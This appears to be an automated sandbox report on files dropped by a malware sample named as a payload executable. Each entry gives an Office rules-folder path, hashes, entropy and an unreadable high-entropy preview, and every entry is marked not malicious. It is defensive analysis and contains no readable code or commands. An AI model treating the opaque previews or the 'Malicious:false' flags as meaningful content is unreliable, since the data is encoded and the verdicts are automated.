
                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703800v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1715
                                                                                                      Entropy (8bit):7.884385631175995
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rZtrQyreOn06NfzmaGiSp7yHmb+1L62fMdfchwD:rP0y306hihvpr2fXC
                                                                                                      MD5:0238A8A0EC799759BCE610E339C05E28
                                                                                                      SHA1:AEC14C5C6EA66D7ED5EEDC55087BBFF599825DF4
                                                                                                      SHA-256:E4F6CE50CA49695597268173AC835A48F04C7AC8012306DA216B9CE4E519B432
                                                                                                      SHA-512:1CB1E8E84DAF15E45DEFACEBBDC40CE1C6200B835102BB3B80E8B73F692AA47A49E5ADB22BDBC9A832FF080726F177AE070192FF81567CB93A5634AA7A678AB6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.v..8...#...J.05..A...h........*...5...K........K.,.z..?.."[.."......3q.g....P.bf;....$....\..soz.zq."......'.=....@mhY3.r..1.....tj-.j8..a.xR....Y8...A........M........f....0.Tf......1.'.....e.l.HY.ih@...dKnEpvc.[.K:...UI.-T.N.TE.G..B..U2..R%.N.B.......a*.n^D......._.....d..G.ow8.......V^P.L....(..e.8zmT...[...`.4......w.....+..x.....v..aT..k^:#.s[5.f.:.....p....O.Yl.X..C{.0..Q.M....Ds.......u.^.....d...\...E%R....... .+.A.sSF7..XY....a..5!.1G.....f..@.`..W9...a..`).I.v......^I.Y.=.i{..>R....M.(.n..8@?D...bg.w;"y.!9..$u>V..dW-..e.9R{j]*.b... ..h...^..H.......n3...s...n~.).3.....0..j.a%N"8.A5C.;.....8..|...j..9o...1...#....P...R.z..p........G&Xm.3q..b........Z7o..YBl..[]F.+.[....A.:.j9.....c.4.f......N..y.....;A.Qe..~g..7....8..{.{..d6...qu.........6...._...7..@.8...)Tbu.y<...N.|..L.r..*...}H...7....9.;... ....:u...K10....@.{....2........+.}^W.x...U/EUG.z..r.,.... .Y.....5R.........).. ._. @....u1?.t.}.}.OK{a...W.e

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703801v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1752
                                                                                                      Entropy (8bit):7.888921568015364
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7OFGUWQ/NKDSZ6MVsol694jfDp7zTBkur/kj7ladEAaxTyoJbl/wBQy94PkFN6L2:yIjoTa54LDp7zljDxG1bloy8kODCwD
                                                                                                      MD5:64986171566D9DE974FA26CEEE183666
                                                                                                      SHA1:5A97BE69B4D99486624FBAC17F43C8B82EF1855C
                                                                                                      SHA-256:A43F8F2168044B7EE4DDB6ADA0BD5B038FC422482FFD2F054C2544D8211742A0
                                                                                                      SHA-512:7938136A932B58D397C7B7DAD6A2371916B1154B292A31AAE9E3A642B25D9FFD84ACBF31E42333EB30E3B483B3E38563C70A5CCBBF48A41EBCA2CF54BD371370
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.o......k.J..4#3.@.I@.D.t..9h.=. ...=*.'.<..%.9d..f..Lt..n'..<K..p..^X............@...h...J.m.`B.^....5.P..[.....dkVLe.b+>$.s+.nc7..._Z.........}'.0l.........._...uh..d.....x..W.f...k...1xX.......Du.t..B.l....t)...n...T.m...G../.!:....1 ...a...,.8b.{?....N..b.<.p...#.j..-......_i...%W0..........uy.-..o.V..m...(0.;.@.n!y.C.I.>N.'...!.9g..I....#c...||..........p...3.<...K..=..9.6(.G...H.g..:1)...c9....7..>..u2.z...yL...A3..S...........L.....oY.....;..b...x[;.r.N..ln.D@9.T....Y`h..c..-.'12...!...G....R0.7.j4...%.4$n....#g.I6...+Neb..G.....bn.G..4.'T.nS..R.bN...;m....B(z..t../.Xr.D.O....1..v..,..aW.l...~..I..Wx.z.....cj....\..A............z.M:{.|.s.<...c.g.4+..r~+..i.fP..g.hx..!.,.....c Z.myDl....pMN4.b.:z.N...k.qH....E...T.>.e3R7.`.U".GO....O....%....F.......L......Q.....u.a...Y..0@k..wV[.{. ....6.7r2..$9.f.G.pi..N.o^O.....v.'.a$.A9-`..~V..X.$.......%....h.......tV.C.K.....&.'..5...%....E..[.D..Y.r....a.RDVg..H!.L;(.q<......-.O!...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703850v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.886589619114932
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xC7lumtHcy2ltgBT0lGwdPRSc5ZhUmfhc2wD:ylbH4lGwGc5TJ8
                                                                                                      MD5:097E9A2D523A20754313DB37342A4279
                                                                                                      SHA1:0CD560AEAF264911D582D7F6DD0616AC6EEDEC8C
                                                                                                      SHA-256:2324B47A192A415FA1FA543084F842056EC3E56BB50799DAF9711B0542A222EF
                                                                                                      SHA-512:3846F30DD76FA4286E0E1DAE2585FF84620F36759F485C6BAA197B3774BA7CDAB360BABB8ABDECD58F33D52E1E53C2DB8F7E5F46BA7CFF3EC45A21AC16C76B0E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml8.....{.X..gSs.....jA.....I.}.w...6v.dq..S.6.....F.?2.V..ig.'....O...!....;.....n....f.....)uo8.ga?UX;......"..IA.;.Xr..9:O...L.G.z.k.;.3.7........!.]9..X....x.4V..r.tz.j..9.!".)6.J..x.."...i...v..U...2.........W...._....N..hh]..O.....,..5.u....d...F;.k5..>t7.Y...,...Ar..5..7.z...vX.fq|..%Gm[.JQ.S..0...N/...J6Xq...^.....$d`....Pv......E..?.8.v....Ha6'.k.....8....I.J.,.Z...\...%'..^.T.il@!..f...i...p.Sb#k^.z.(yB.dM.+,OoV..[..o....,.~..D....Zz...'..<...b..V:.aL..0.CD&.....ul\.....C..O..5.M.....Q.2;..,=)O.aUP.q.>q......H...@..|&.w.p...-|.<2......a.M3/.W#.e.(J.I.W.L.J..V....Up^:..>..m[H.bw...C..A.-.G...5m..r.b....@6..e>qPE...."C#9V...7...|.{.........Jv.Z......3.....\9.....0..DYj.u.&n.d.3b.C.U...Y..0$.u...:...zi.....?^8.....g.mW.Ai...7....s#.z.r.#..`.u.o@0..\p._.~..r.^.f..;...^$...V.. I...X..d_..C..A4G.7b.j.U.:.-G.?-.............D..st.E..J.el.}.v...#...k.w.B*......]..g.<..\.........c..q...I../`BI...?}x..y...<....|~.).Q.@s.h..D.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703851v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1775
                                                                                                      Entropy (8bit):7.884191447176078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:4a89dwKfzXV1Jc/eBigwX1WoSR98ge4SMnQ285wD:Z89mKfLVM/Ki71Woae45PN
                                                                                                      MD5:9C8BAA9C59CEA642F36F1F04A12E3B87
                                                                                                      SHA1:929621E9AA4472A94675B0533B835D3E00C677DE
                                                                                                      SHA-256:00B4B244919F92BEF69D6EAE5E1D8B565CC70C2609766BCAE61EDF394C6B96C2
                                                                                                      SHA-512:21F0CD8A61BAB3292638110C03BE279613BFF4C775F5F0033A80ED772C1AD5730287D0A311F836A62DF066EA3F9C932E2C37BB9AD8706727E65A0610434F203C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml%.C.......5..FT&H.....C..% .?."..|. U.}6..f....U..0t.._0..15..`..n..>...P...@.<...W}..w.;'.g..:.....S!...{W.b.._...B..q....\....6.p.n..d..4'J%-.?\.61S.'.Q...nPN......g...I.....<^)S....K..\...d/A....P.#f...mp....6.....F..)a5..QZ....?Q.....}...b....h.......5...#..Zi....S.{.....7+....B^.....559=...;....O...7..0....o.e.;....f.b[..B...P.....p(d|;N.^.....rx..>.g}.s...(.<.....GZ..M..U..XZ......(7..Q.\Q'....K..,....F...n0$'....~..VG..I.+...-..&..)...[;...(..z.G...a6.bK.A;.L.Q........#......Ty.v....$.y,..h(V....vb...K.....x.(H.-r.;.....!w....1.r.....)1...;.l[p..{..P.'.\(q.U\.......v.....a.JF5....|..UF..k..O0..<...-..b^...,.....Xd....I.8..#.....fU.\^7].....T.&$..{..UV.%.7:.3..".+..\.N..Bp?..&'{..|G.)...;.8.5.vZ..6 l.J.(...M.4..i.f`]...y.x.<..ed[J...o..5V...f...:Yu...71K4..s.6...Q9..7.n..eS..6..bz.."J.0j...>S..Md..9.q%. ............:.._..g....j../.6.1.t....c...%y.A.......F.}...75.Q]y....>..>.m..".B..pLz..(I....&..2......;....hV.H.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703900v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1723
                                                                                                      Entropy (8bit):7.88329490772758
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wf7VIqX6UrNc2CfDNICrLiuTUL6BE4qL/r023wD:wfxIqX/ZnCrNDqu4L6rS/oz
                                                                                                      MD5:FAA8A61BAF4A5AD74D36E387B47FC1C0
                                                                                                      SHA1:556AE49B7CC7673E421E7A3CA70177C4606E81EB
                                                                                                      SHA-256:91207E6B9F29404E45B54426CE6EF3F6CC682A25F24441F76DE2320702E4D4DD
                                                                                                      SHA-512:039673E087EBD47B8275FDFC9E20420FD13BEED0C9745C37AC2EE69165BB6B815C2444CF6D46302AB43B5CAFD1516D1D2DC13840C3079B623144C3A3A37C0A39
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlJ..~....cg.."#......T|.i..q...).R.*.$...v..EY...<q..HfS.a...O.X.9i.H.K....|_.L....vu.....f.=z.~..|w.R..._.g[X.E.l.....n.{y..Dm...F.&$.O......1J..........e2....a....X..i.t..'.v....hd#mF..;&...v..JM...z.9...4VTU.l...dL....Y..?n..S1.d.F....ygNu.`S._.G.-. ...A?..r..t@x....4m..K..Q.........T....F.+..%.K..1....2..o{#.....0..X.w....3.8...S5.......3.)...DN3.].8U4.Z..}....no......../|....'.5.v....u.s....W.9..1......RV-.:f.z...;c...'.....2zu.x..'.[V.i...S....~.by...i.1z.....2...$..X.yZV.. ........#..S...7.!.}.$Y..%W.L..w.&..0..!'...........:.6nq....u......I..L.*MU..... .....?..I.........~.P.j..z.(.T....Uf.(q.*..G..... MD?..*.<......I...?J.....kW...yl..T...b_.^.im!....9...|.q_...bxY......."._eL"i:..bO.e!...MS;..1...\;:8/.`..L4q-\.0.G.v@9...O....F...)..C...{YT.P...."./..V..-.`.4..bf..*.....*..gj.......-.}....:3..j....upV.l...iFK6R....H.y..C....~<4w....=..6.'H..}.14..a8.......;..#sD...{.[......G..H5G.4.......9t.1..U.Z6...-....c.......t`.f...<.1...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703901v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1760
                                                                                                      Entropy (8bit):7.901234993891192
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:fgCrDdue/JteLMlELO/3hNL1OkoBM+ApUInFwD:fhrBueteih/hDF+APm
                                                                                                      MD5:61D327A35B7270E7C742664DD6BBEE55
                                                                                                      SHA1:6B9296DED4E02356ECC26D7B22FB6B9AC3421D78
                                                                                                      SHA-256:DCA0E6CE8E9DA6F453149E4A9CFBB8046FB5AC9DF14753B736479302055D07C6
                                                                                                      SHA-512:CA2DDCEED263A2ABD148C9D711488D7930829685655C78661A6C90A1E926A43E13CC2AFD4147EE5CFDB8B6083DF1D714D646B768FC6EABE5A52702CF2FC80010
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Yx...t..O..r...w.~.....Q.0...6..B...c?K.+.W(...S@.......$;T....>1Y...@...!..wkD../]........:.L]_X...2.4...>.Z^....;.k:qL".|."G9..|..D...m.....SO...~......R]....[......0.......1k..4..j.R.[Ic.....SW%....N...z...?...1$..L...2.[.....e....3..B.Y~7...2.Dh`;.C.B......`.].........G.Q..9f.&.IK......9.o./)..j.;8...Hs..}..U...B.,.@.6._.K....+...>.Xj.s................}.......r.r.].....]..!`G.7kk...6.._.!.Q...z.k.d/h.>...F....m..i..`)k.r:...w...uc|..Tuu.."J............h(.C.b.........Ku*.k..H.r..f..$..<..-2.bJ....f.E..-..A#....6...X.2.[.^.pN"ClQ..I...R.Q.Fw...*>...A..#2..2.......H^......=.#{.QH..v....@>......l.jB_.\...n%.Vo.}...Z..z.P..0...\H)..#_....n.0.m..*..........Ax7^u.tHAy..`!S.G.%(...f?r.....}.*.....t..)g..<Y.@.OF5j....c...Z7#..E.f.-..&..-X......#.....7..C$Be56.LA.....i.q>.r.....9.V.....>.$...C...;...........3...f...4n..a....o.h.R.4Yy...s.v..q......Y...&nw1.$.H6.E..".Pl......GK..H.6k..'b...t.&u..v..:r.@...%..~.l...;..i.VHn..*.qE\.e

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703950v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1699
                                                                                                      Entropy (8bit):7.888439930054571
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:/2EzESr96jymtWkyxZN/V7Kebq83CT6wD:/2EASr96Rx+Zj7Dbx3CTv
                                                                                                      MD5:F42C6F2C7BB5BA4A3B6629C56E1FCCAA
                                                                                                      SHA1:2D9883FBDC1F6B1F694166D0CA017C3EDB37721D
                                                                                                      SHA-256:33C0713AFF12674578E1CC8D48DF70410A76633AA326587C598D1386D2201634
                                                                                                      SHA-512:C88DC1F134A5AEC1D2691F1BDD539A40500041358F22F0039C3E9A5CF015F381C98644B25011AB582E6AD8A67603E41D4B2C9829D9D51149FBAA31600DFA14E0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....5.........Z.Q.d..U.X.(~.].b..O....*..]xf..;p..-N..$..Z..".O.*...;.Y.x.g.._..o..h./*..>......P.....$<.>-U@. 0........b....8.......v......a.23*...qI...t....W..).dD.X...JH.|....,.`.......k.).+k.g......o.x..e.~.`2.....bg.-Y.S.j._...U4`s8....>....u.J.r2.E.;...8..X.u.....9......P...:..,I...!0.=...2...!......p.V.@Kf...".......v....zed.........5^...[o.sjT.H...e3.vA.N7.\..Z.K..E...gV.....2!m$,ABk.</n7.gt4dT..Y...B..K..x..ml..m)[.......__4.GXI~. ..1...r..+...Q.i)7...%..........g.#|.(.......q.....E...G^...o.......t|._C....O.....e.a..s..C.........c.~.$.........Tc...n.8...>.Pd...[....?.x...G.Tt.(..P5...to..t..T.].9....<.O..H%../C...-.S.j.w.L.....7..o....>.]...".U.k....u.8...'...b<.}.4.@.........Z"..1.7I.,...n.+.H...Ef.. (N...e.....X-.Wc...S.b^.....3.VT.....1...hY{..7..$xX...l..-.%xM..o.cO...J.a._..?.f.a.>.....l....|I.....J.-r.d..i..U..T...)!........CrP..Y.s..X...m...'7..Av..Rb......f.u ...kL...v.........zG,>k...>1A...6.})O$..e...e.Pw.H[

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703951v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1736
                                                                                                      Entropy (8bit):7.8730688472905515
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bUFrPalpQHU8iwIaL5xRyWa3PZArZWq0gMNo2utnoIhFFjtXwD:bU9a/FS4TZATauZoIFjy
                                                                                                      MD5:231F6AB8C46C5FDC41953D51AAD9F879
                                                                                                      SHA1:16F7280060C4A3F0C0DD99D171D90DF7969F7096
                                                                                                      SHA-256:0D350934B23373844B55EDCFD925C85349F4D368767A4E803FEBC81C57DE50B0
                                                                                                      SHA-512:421EE1D9BAFA5AD2D1F4949810E1E79AC3755AA7D2D1630C009399E86EAB19449C1F3D47234090521B423AAB350F400A13F513C2A24F921C2D8C1096FA0D061D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.{0.D.......Dd.......T...};...K.....1.\.....3.....?..FG..Z...z}.ARK[{M^...). ....J-.............Zbv@R...Aa.6RE...B..B...,Q..}...Cg..Y.-<...V....7r..i.(...1....=.......P.{'f.......}.......3.m(.r..g`..S.<.L....."...i!...n2=.,.=o...5..^.$..YIY4_{N.,.S^...W..Y..y&IC.V....[..4..k,}...J.+0..w.c.H.....qv0.c.....2.b...A...Z.........,a....c..6.I}M..5th.H..O..yq;...,..\Hi..S....%......(.m..?....;... .N.O.....c.j..v.6....$?.6"tF..].~k..i'......g...*.._r.%..]g)..E...1..TSt..y.....N..Bk.T..Q9...XR.R..m..C./......i.`.!....q.......e.{..h..H.!...0..s....1I.y.....>.......2..p..N>[7.G...B......H..I..Kj..S.^...8.(8..?F....].v..N.=..~....+5[....!Y.jj.h.kfe.....0.{o..8Da....=...6.....8q.x..S..T.9..:.....X....p..lg...[....+Y%..9..F.!.P..OF..'...,.%.Fh-....r.l...a.*..pwrqp.%#..a.x4....;..).qB....!RQ.J..Z.C|.\D.O.Q..>.Z*.c...aft.5(.T>pE....[..e.E.>.."f..H.$9a.{.&Q.....+.}..B.......+..+tN...u......H..P.:..I..s.Dg..Nz.R.i.3.4I.i;...~..!k.4...(..{.7..+...\.e....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704000v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1715
                                                                                                      Entropy (8bit):7.881060573127977
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Hg69ab0WNbL0hsZ+Wwsi6pqiAgHnnTA/EDZbfkwD:N9aoQ/0hcpdTAqD
                                                                                                      MD5:0124CA6BC6E54AE9C33C02C72D8B1E32
                                                                                                      SHA1:E2256F1A61AA4DF9FBCA257B7125322437082183
                                                                                                      SHA-256:70FE323DD799B78750EFDFBB8824CA1116AC7475C355838276B491DDB20CB7F1
                                                                                                      SHA-512:1F2FB714D4A65820F0107405ECF4F991FAE1CCFD0AC24CEC635E19C3FB1230922EB2943B0007782BBAE2FD1706422A54999FDC9CA44AB7156F5DB1A3FF2B4862
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.$...Bc..$..Wu6.`H&dv#.-w.r..,...|...O....;..yU.H$2.eE.k..QX/.. o..1....l..._"n.i.......6..\.+..F.....".....eN.S{..hx....EV2.7..?..e..g..[.C3......z.]q..RA...;..g=......*...l..K.)...^.^HL..j.w=...w........OA.'......#...C....A..$.N...t&..t,#r.~.\...=ko....?.[.`..^.........COpl.0....."....n8[...2)^V....<....'^....Us.un..x.(........m.]&....._...,.S-..kY..R%.} h-.K.Q..u.]..1;..cZ:R...Fq..u+..r..Q.m8E......9h. .s...d."..7...+...:t.0.v~....!.i.....G=.'y.y..o.+..<.[4.C.....'P.........i#R....W.7..7DvB.e..m..^.!. av.j.<......^....E......."Z.R..v.T.G.,..LM..N..,!.Qe..M?Z....$. .D....Ei..]..M..d9."..8...+.c(|K.2...rK. ys.....M."uM.d....p...t..c..:...2.mp..c.!.>Fl.Q...o..Z..H..)0..,...H..[U.g.b.;.y..=.d.~..1..7$.j..~uV...qc{.<.\....1.3l..f..4....PHT...j.wc...`n.c.s.M..~...2.._B..L.....u....i.....(:.^-._]..Fg..2.~.t.c.'.........._W:M.R....>...5.v..&c.N...B..i..wN.p..a..]......_8i......7....h...C.Qi...b.....Y...qC.P.. ..'O.....\...2..).-.R^.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704001v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1752
                                                                                                      Entropy (8bit):7.878959677692005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2C2kXAMfAwGfjvXZ8bLZIOd18J8r2fTcaTEwD:2C5o1zX23ZI8f6fTcaTd
                                                                                                      MD5:832B007472C7960BDEDBE966AA9EBD75
                                                                                                      SHA1:A4E84CA88ADE2D7DBA2CACB95EE4F3F855046FC7
                                                                                                      SHA-256:6B7EB800C74D84321D5BD2E6EF1AE1AE90516E6CD98FE10857059758417AF7EE
                                                                                                      SHA-512:FB85925C80A3516B11B74AF766081E31AF8578511F4F0201F39D31F929508C53F23DE52CFC18FF29477D9D0B2A420D198298BE1269712F9198129DAB5A41F37D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.J..q..~..CG.......S.....Il..6.3.......4Y5.E$9%.ab.#b...a8.n;.0.%......v(|-h.g$C..../.:{F..H...t4d..;..=...^....o.M.=Ic<;..[.1A%..1:K....T..f.z....%....~...~..i..?.v....|)...o.C-...j..U..RimfY_.d.t[...E....Y.5......!....j..i..<.#.|... ............X..J".[R..a..#........3m.....o.au.{Q{.`t... .W.,.o...@=.9.:..J.......).e.d..V..@C...b.2....9...y.#&(..j.WS../S`%..2.$..q..X8(;....p.u#Y....xq .=f.0#../.......u;.=d..V......j....2.@...O..s..w.?g.y)(8.i.....V.4..a. ..r.^.~.f..J..Y..B....... ... .....$,a....m:.#,.}.k......q.0NqzN.+8.....v...Jf........8.^........I.az.....Fo..#.Ebs_.?E.P."......6].U@..%.'.=...N.o#5.*.|........7T.m.+6V.t..@".m..y..,t._......$.......{.g(.x..U...|.K....qe..K1............I.......'.&5.(....W..z...2..B...&.. z.x].......m~PE.\....i....Z...L"..t9.1r7.MV(/..SG../E...b$i....@..T..2..V.|F.2.#.O..8V.e.......>..A...Qj....({X..v.C..:.ay.g......2........W. ......'2vl.X....Fm.V0.....)...C..Mg.....*..3.O+..+...._3....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704050v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1689
                                                                                                      Entropy (8bit):7.871025885695054
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:U0hqPo6mk99Y39NNlrI4av8qSkByo1WPZawD:6v4NN+FSO74PB
                                                                                                      MD5:FAF50A74E2821EC0200CCCD4400CE1C5
                                                                                                      SHA1:CE80D0ECAF5F131FF36AC5497C6426247D5B81C8
                                                                                                      SHA-256:0C5F660C2D1A61F6710995377801C9F1A633F565DFDCB33E691328E981874EFF
                                                                                                      SHA-512:6E791065DBAA76356E0D452D8C994CE6E440B675988CB58BD9F2FBC2C069302A73F06C8F14343401A15396D1EBEA97A5850125E7583D188E81132D21D908005B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlK.....r...G.....]..5.a.7..X...;y..i.0..g..Pz.....nYDq........o>.#E.\..uB..I ........v..!O.z..O.\.l.r...E..X..c.@;<T..yy....m.%Rl...e.......q...gS.l....s..0B......XN._.c....q3....5W...?...f...`..w..ka.......C=.=..I@kr4.lv..$.{.......-......;w.....v...~..w;].............}..y...*?....[.7...G...lag...?.+^t/CEw..w.+...i,S..v/...r6k..'.n....g3J...S.......n..bF..WW..]...]`.J.B...Ue6gx.Sh#..,...Ao..\.....p..]j.....{..$.*!.y`r..V....T|..`...f.t?`9.|g.0.w....>....?^..*..8..8.}..mV......+.mX.....<..i.l....@7:."%\.7......8.......3....g*[.G.u.`t.....C,$z\^..S.b.'..2.3.....M.x.;...[.../.C..l.e.+..w.W.E.<...ZP....g..N.....{.1.Q....B$..v....b..T.S.....z..`.vcC#.9.g.K.o..D..}......I...P.s...c..-..j7....e}L....D.qW.-..-%j....T.....Y..c..{.p.5."..o1Ns.7.....}.Y..?.m5R..S...0...H..3......p.&.....un.Z...........B...tA..^.|.`....~g..*?.-r..<k..A..C<......V..\.:.....J....A.\xP...k1......TF..!e."j..%.i..".b>.<.(...w...30.....7.9.... .d...@...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704051v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1726
                                                                                                      Entropy (8bit):7.891947512982304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:gNO8YtDwX2OYjhobn7WkzaKweoaDrAgMwD:gcPtDJjhojS7KweJ0gV
                                                                                                      MD5:9DC0B9AD3E1E17E6F001614C75D7CBFB
                                                                                                      SHA1:F93F5F4B595BD42607F66CDB9AFF820F0EBB2AF7
                                                                                                      SHA-256:F60C2EF2A0803E3ABB69D75B3246E7442C1EA9D04664AD1B23E91982406006CC
                                                                                                      SHA-512:972D4A13EC426CC4F48E1C2DAE246FAC22D3BE599F85322B7472CDFDE4941DBCC8DBB7AA5918DFBC09BE6BCCC1E1FBF3782CE18F03CAEF7BF24C1ABEBD3FD98C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml../.N.D.....t...n..36...+h..6....e?...T..E.fK.|.c...L...A...z.hS2..v.\u\ .VeK.,.etN^w.p..E.....Fm.B...0j............p0Mm..}.Sf.Nldv..".....x..p^...z7..{.{..?.v.W..= ....^..e..=E....k..%...QS4.....>/6..N.6..x6...uA.......1.D.A..w._...0.n.v...K.<.X.-9..1;.:i1L..<...C.+.m...PU...u?.@..G...fb.......)h)...\yc..wd...^]\.......\TF...=~..lk..&.aP......t.y=.%...(..F...U..fF..J._ .C. .O.i.. d.s.....U<..$^Rp7.p..{.#.......5.`.].~.....z...y..7U...).;....\......r.....E..9.M)....z..........1..'H..=...eDA..}./2..g{......k.Z.:B.........$.p['.f..H]..">..S...p0..:....7...$".......1..z.>...O.8....=...7E.v...v...j(.....at~...........).n...N.:..A.Za...(..P._@,./.).D....*.IR..]...h.U......I.q..N..........z.C....,Qq..m|.u...)H..Tsjp.R..#R...9.5$.t.}.N.1.@~.......}.%.f:.o.NL..+@$.k....u.......:..{...Q.5.dn...d....h.a..4I...&..s.J.P. .Y..u....Z..5...:6...J.8r.qj..hM.h..j.c.......x.`P.....r.X...H.$8..nM\..O[l..S..1Vh4R..hX^(l.\r.T..Y..wd.I.T.M>.Y .C.....wS..!

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704100v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.894174966924715
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:FYgQ/fOkhV/j1mWR/6qz/OE94BSMkjKvVLqwD:FbQnnzEW51D94BSMcOf
                                                                                                      MD5:8722EAF3FCB981F9B07EBC8BC605DC75
                                                                                                      SHA1:533F3F035FEDA7A9D3645E01C126F53BFD34EEA0
                                                                                                      SHA-256:B1D8C6655C001DAAC2BE5C27AAA4B383BB2BEB1D347B829DF432DB8C64847CFB
                                                                                                      SHA-512:35D38DE45E9951F53387B35F3A958FC6EDD8273035F64B8584920B8D43A75A6F0C2C7FFBAB9B2670C025D0FF088AF55D7E291F3C29405C9793B05C3C3A1CA29F
                                                                                                      Malicious:false
